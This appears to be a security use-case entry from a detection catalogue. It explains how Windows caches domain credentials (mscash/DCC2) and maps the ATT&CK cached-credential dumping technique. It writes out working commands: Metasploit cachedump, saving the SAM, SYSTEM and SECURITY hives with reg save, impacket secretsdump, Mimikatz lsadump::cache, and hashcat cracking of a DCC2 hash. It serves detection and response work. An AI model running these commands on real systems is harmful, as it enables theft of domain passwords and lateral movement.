UC0022: Dumping and Cracking mscash

Summary

ID	UC0022
Brief Description	Credential dumping of cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.
Author	Alex@Cyberok
Creation Date	2023/02/28
Modification Date	2023/02/28
ATT&CK Techniques	T1003.005: Cached Domain Credentials
Tags	Credential Access Windows
Linked Response Playbooks	Dumping mscash
Artifacts	Host File Windows Registry Encrypted Credential Password

Description

Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon. It's worth noting that cached credentials do not expire. Domain credentials are cached on a local system so that domain members can logon to the machine even if the DC is down. It's worth noting that mscash hash is not passable - i.e PTH attacks will not work.

Windows caches previous users' logon information locally so that they can log on if a logon server is unavailable during later logon attempts. If a domain controller is unavailable and a user's logon information is cached, the user will be prompted with a dialog that says:

• A domain controller for your domain could not be contacted. You have been logged on using cached account information. Changes to your profile since you last logged on may not be available.

With caching disabled, the user is prompted with this message:

• The system cannot log you on now because the domain is not available.

This is known as Domain Cache credential (DCC) but in-actually it is also known as MSCACHE or MSCASH hash. It uses MSCACHE algorithm for generating password hash and that are stored locally in the Windows registry of Windows operating system. These hashes are stored in the Windows registry, by default the last 10 hashes.

There two versions of MSCASH/MSCACHE or DCC

• MSCACHEV1 or DCC1 used before Vista Server 2003
• MSCACHEV2 or DCC2 used after Vista & Server 2003

Cached logon information is controlled by the following key:

• Location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\Current Version\Winlogon\
• Value name: CachedLogonsCount
• Data type: REG_SZ
• Values: 0 - 50

Any changes you make to this key require that you restart the computer for the changes to take effect.

Attack mapping

ARTIFACT	OBJECT	DESCRIPTION
Attack Prerequisites
Host	Compromised host	A host to which an attacker has a privileged access
File	Secretdump/Mimikatz	Depends on used software "file" entity describes either secretdump.py or mimikatz executable file
Windows Registry	Registry	hklm\sam, hklm\system, hklm\security registry hives
Side Observables
File	Registry hives dump	hklm\sam, hklm\system, hklm\security dumps
Encrypted Credential	Mscash	Credential which can be used for furher dumping and cracking
Password	User's password	Password in plaintext which can be extracted from encrypted credentials

Attack results

Extract a Mscash of domain user for further cracking to get user's password.

RESOURCE	DESCRIPTION
Attack Prerequisites
Privileged Access	Compromised host with privileged access
Result Consequences
Credential Access	In case of successfull hashcrack, attacker get a plaintext password which can be used in next stages of attack, as an example for lateral movement

Attack progress

Cachedump

1) To dump cached domain credentials in mscash format, use a post exploitation module cachedump:

getuid
getsystem
use post/windows/gather/cachedump
run

This hash can be extracted using python impacket libraries, this required system and security files stored inside the registry. With the help of the following command, you can pull out these files from the registry and save on your local machine.

reg.exe save hklm\sam c:\temp\sam.save
reg save hklm\system c:\system.save
reg save hklm\security c:\security.save

Once the hives are retrieved, they can can be pulled back to kali linux to extract the hashes:

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Mimikatz

2) Need to download Mimikatz (mimikatz.exe & mimilib.dll) into the server. Let's use metasploit to save those in %temp%: So, we can get DCC2 / MSCACHEv2 hashes using mimikatz by installing it on a compromised host and executing the following commands:

privilege::debug
token::elevate
lsadump::cache

Possible usage

Cracking mscash / mscache with HashCat

1) To crack mscache with hashcat, it should be in the following format:

$DCC2$10240#username#hash

Let's try cracking it with hashchat now:

hashcat -m2100 '$DCC2$10240#Administrator#206dd880bb27121182298a0bd8b87d1c' /home/kali/Desktop/passwords.txt --force --potfile-disable

Attack diagram

References

Windows 10 – Get Hashes (Domain)